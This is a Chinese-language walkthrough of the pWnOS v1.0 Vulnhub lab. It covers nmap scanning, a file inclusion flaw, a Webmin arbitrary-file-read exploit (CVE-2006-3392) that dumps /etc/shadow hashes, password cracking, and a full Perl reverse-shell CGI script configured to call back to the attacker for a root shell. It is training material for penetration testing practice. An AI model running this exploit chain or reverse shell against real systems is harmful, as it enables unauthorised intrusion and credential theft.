pWnOSv1.0
|
645
|
0

758 字
|
27 分钟

pWnOSv1.0

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:33 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.133
Host is up (0.00072s latency).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.98 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.133 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:33 EDT
Nmap scan report for 10.10.10.133
Host is up (0.0012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445,10000 10.10.10.133 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:34 EDT
Nmap scan report for 10.10.10.133
Host is up (0.00042s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_  2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-@  Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m01s, deviation: 3h32m07s, median: 1s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   NetBIOS computer name:
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|_  System time: 2023-07-24T06:34:54-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.74 seconds

UDP

└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.10.133 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:53 EDT
Warning: 10.10.10.133 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.133
Host is up (0.0015s latency).
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
137/udp   open  netbios-ns
10000/udp open  ndmp
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.77 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.133 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:36 EDT

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|   /index/: Potentially interesting folder
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_      http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 344.74 seconds

渗透思路

Web渗透

目录爆破

└─$ sudo gobuster dir -u http://10.10.10.133 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.133
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 07:37:03 Starting gobuster in directory enumeration mode
===============================================================
/php                  (Status: 301) [Size: 328] [--> http://10.10.10.133/php/]
/index                (Status: 200) [Size: 295]
/server-status        (Status: 403) [Size: 311]
/index2               (Status: 200) [Size: 156]
/index1               (Status: 200) [Size: 1104]
===============================================================
2023/07/24 07:37:16 Finished
===============================================================

有几个页面,index1.php页面手动跳转显示文件包含错误

应该是缺少参数,尝试寻找参数,发现从index点击next,报错消失,路径跳转为

http://10.10.10.133/index1.php?help=true&connect=true

测试两个参数中哪个是文件包含的参数

└─$ curl 'http://10.10.10.133/index1.php?help=true&connect=/etc/passwd'
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>

<form name="form" method="GET" action="index2.php">
<table border=1>
<tr><td width=175>
Name:
</td>
<td width=175>
<input type = "text" name="name" size=25>
</td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>
Skillz:
</td>
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>
</tr>
<tr><td width=175>
<input type = "submit" name = "submit" value = "Please Help!">
</td>
<td> </td>
<td> </td>
<td> </td>
</tr>

</table>
</form>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

</body>
</HTML>

connect为包含点,尝试获取shadow文件,失败

尝试访问1000端口

发现为Webadmin,查找历史漏洞

└─$ searchsploit webmin
----------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal  | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                 | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion             | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                         | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing      | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                          | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                               | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                     | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                               | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasp | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                          | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)             | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metas | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                             | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)  | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)       | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)             | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)       | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution                        | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure     | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure     | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)    | linux/webapps/47330.rb
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
└─$ searchsploit webmin -m 2017
[!] Could not find EDB-ID #

  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/2017
     Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
    Codes: CVE-2006-3392
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/Desktop/pWnOSv1.0/2017.pl

用法如下

Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

获取shadow文件

└─$ perl 2017.pl 10.10.10.133 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.133 on port 10000!
FILENAME:  /etc/shadow

 FILE CONTENT STARTED
 -----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

获得五个可用的hash,尝试破解

└─$ john shadow.hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware)
1g 0:00:07:47 DONE (2023-07-24 08:43) 0.002139g/s 30166p/s 136920c/s 136920C/s  ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

尝试登录ssh

└─$ ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.133
The authenticity of host '10.10.10.133 (10.10.10.133)' can't be established.
RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.133' (RSA) to the list of known hosts.
vmware@10.10.10.133's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$

Perl CGI 下构造反弹shell

构造shell

└─$ cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi

┌──(kali㉿kali)-[~/Desktop/pWnOSv1.0]
└─$ cat shell.cgi
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
                # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
        cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

        if ($auth) {
                unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
                        cgiprint("ERROR: Your client isn't authorised to view this page");
                        cgiexit();
                }
        }
} elsif ($auth) {
        cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
        cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
        my $pid = fork();
        if ($pid) {
                cgiexit(0); # parent exits
        }

        setsid();
        chdir('/');
        umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
        cgiprint("Sent reverse shell to $ip:$port");
        cgiprintpage();
} else {
        cgiprint("Couldn't open reverse shell to $ip:$port: $!");
        cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
        my $line = shift;
        $line .= "<p>\n";
        $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
        cgiprintpage();
        exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
        print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

修改默认IP和端口

# Where to send the reverse shell.  Change these.
my $ip = '10.10.10.128';
my $port = 443;

上传shell.cgi至靶机

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.133 - - [24/Jul/2023 08:52:47] "GET /shell.cgi HTTP/1.0" 200 -
vmware@ubuntuvm:~$ cd /tmp/
vmware@ubuntuvm:/tmp$ wget http://10.10.10.128/shell.cgi
--07:52:49--  http://10.10.10.128/shell.cgi
           => `shell.cgi'
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,714 (3.6K) [application/octet-stream]

100%[========================================================>] 3,714         --.--K/s

07:52:49 (770.83 MB/s) - `shell.cgi' saved [3714/3714]

vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
vmware@ubuntuvm:/tmp$

使用之前的payload访问上传至靶机的shell.cgi文件

└─$ perl 2017.pl 10.10.10.133 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.133 on port 10000!
FILENAME:  /tmp/shell.cgi

 FILE CONTENT STARTED
 -----------------------------------
Browser IP address appears to be: 10.10.10.128<p>

 -------------------------------------
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.133] 43094
 07:58:13 up  1:25,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.128     07:45   18.00s  0.04s  0.04s -bash
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# python -c "import pty;pty.spawn('/bin/bash')";
root@ubuntuvm:/#

提权成功

CGIFileInclusionVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇